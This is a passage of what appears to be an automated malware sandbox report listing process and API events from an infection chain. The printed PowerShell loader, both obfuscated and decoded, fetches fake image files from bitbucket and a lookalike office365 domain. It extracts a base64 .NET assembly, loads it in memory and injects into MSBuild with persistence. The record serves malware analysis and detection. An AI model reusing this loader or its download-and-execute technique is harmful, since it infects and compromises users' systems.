                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_00478DC4 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,12_2_00478DC4
                            Source: C:\Users\user\Desktop\soft.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@CJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gq@zwbm@gc@z@bm@gy@zgbm@gy@zgbm@gy@zgbm@gy@zw@v@gc@z@bm@gc@z@bm@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@di@lgbq@h@@zw@/@de@mw@3@de@mq@z@cc@l@@g@cc@a@b0@hq@c@bz@do@lw@v@g8@zgbp@gm@zq@z@dy@nq@u@gc@aqb0@gg@dqbi@c4@aqbv@c8@mq@v@hq@zqbz@hq@lgbq@h@@zw@n@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@9@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@@k@gw@aqbu@gs@cw@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@c@@lqbu@gu@i@@k@g4@dqbs@gw@kq@g@hs@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c@@pq@g@fs@uwb5@hm@d@bl@g0@lgbu@gu@e@b0@c4@rqbu@gm@bwbk@gk@bgbn@f0@og@6@fu@v@bg@dg@lgbh@gu@d@bt@hq@cgbp@g4@zw@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@hq@yqby@hq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@fm@v@bb@fi@v@@+@d4@jw@7@c@@j@bl@g4@z@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@rqbo@eq@pg@+@cc@ow@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@cwb0@ge@cgb0@ey@b@bh@gc@kq@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bl@g4@z@bg@gw@yqbn@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@c0@zwbl@c@@m@@g@c0@yqbu@gq@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@c0@zwb0@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@ck@i@b7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@kw@9@c@@j@bz@hq@yqby@hq@rgbs@ge@zw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bi@ge@cwbl@dy@n@bm@gu@bgbn@hq@a@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64lengthh = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64lengthh); $endindex = $imagetext.indexof($endflag); $commandbytes = [system.convert]::frombase64string($base64command); $endindex = $imagetext.indexof($endflag); $endindex = $imagetext.indexof($endflag); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $endindex = $imagetext.indexof($endflag); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -exec
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gq@zwbm@gc@z@bm@gy@zgbm@gy@zgbm@gy@zgbm@gy@zw@v@gc@z@bm@gc@z@bm@c8@z@bv@hc@bgbs@g8@yqbk@hm@lwb0@gu@cwb0@di@lgbq@h@@zw@/@de@mw@3@de@mq@z@cc@l@@g@cc@a@b0@hq@c@bz@do@lw@v@g8@zgbp@gm@zq@z@dy@nq@u@gc@aqb0@gg@dqbi@c4@aqbv@c8@mq@v@hq@zqbz@hq@lgbq@h@@zw@n@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@9@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@@k@gw@aqbu@gs@cw@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@c@@lqbu@gu@i@@k@g4@dqbs@gw@kq@g@hs@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c@@pq@g@fs@uwb5@hm@d@bl@g0@lgbu@gu@e@b0@c4@rqbu@gm@bwbk@gk@bgbn@f0@og@6@fu@v@bg@dg@lgbh@gu@d@bt@hq@cgbp@g4@zw@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@hq@yqby@hq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@fm@v@bb@fi@v@@+@d4@jw@7@c@@j@bl@g4@z@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@rqbo@eq@pg@+@cc@ow@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@cwb0@ge@cgb0@ey@b@bh@gc@kq@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bl@g4@z@bg@gw@yqbn@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@c0@zwbl@c@@m@@g@c0@yqbu@gq@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@c0@zwb0@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@ck@i@b7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@kw@9@c@@j@bz@hq@yqby@hq@rgbs@ge@zw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bi@ge@cwbl@dy@n@bm@gu@bgbn@hq@a@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@cJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64lengthh = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64lengthh); $endindex = $imagetext.indexof($endflag); $commandbytes = [system.convert]::frombase64string($base64command); $endindex = $imagetext.indexof($endflag); $endindex = $imagetext.indexof($endflag); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $endindex = $imagetext.indexof($endflag); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0042EE28 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,12_2_0042EE28
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: 12_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,12_2_0042E0AC
                            Source: C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exeCode function: 13_2_02B9E875 cpuid 13_2_02B9E875
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: GetLocaleInfoA,11_2_0040520C
                            Source: C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exeCode function: GetLocaleInfoA,11_2_00405258
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: GetLocaleInfoA,12_2_00408578
                            Source: C:\Users\user\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmpCode function: GetLocaleInfoA,12_2_004085C4
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\soft.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\soft.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
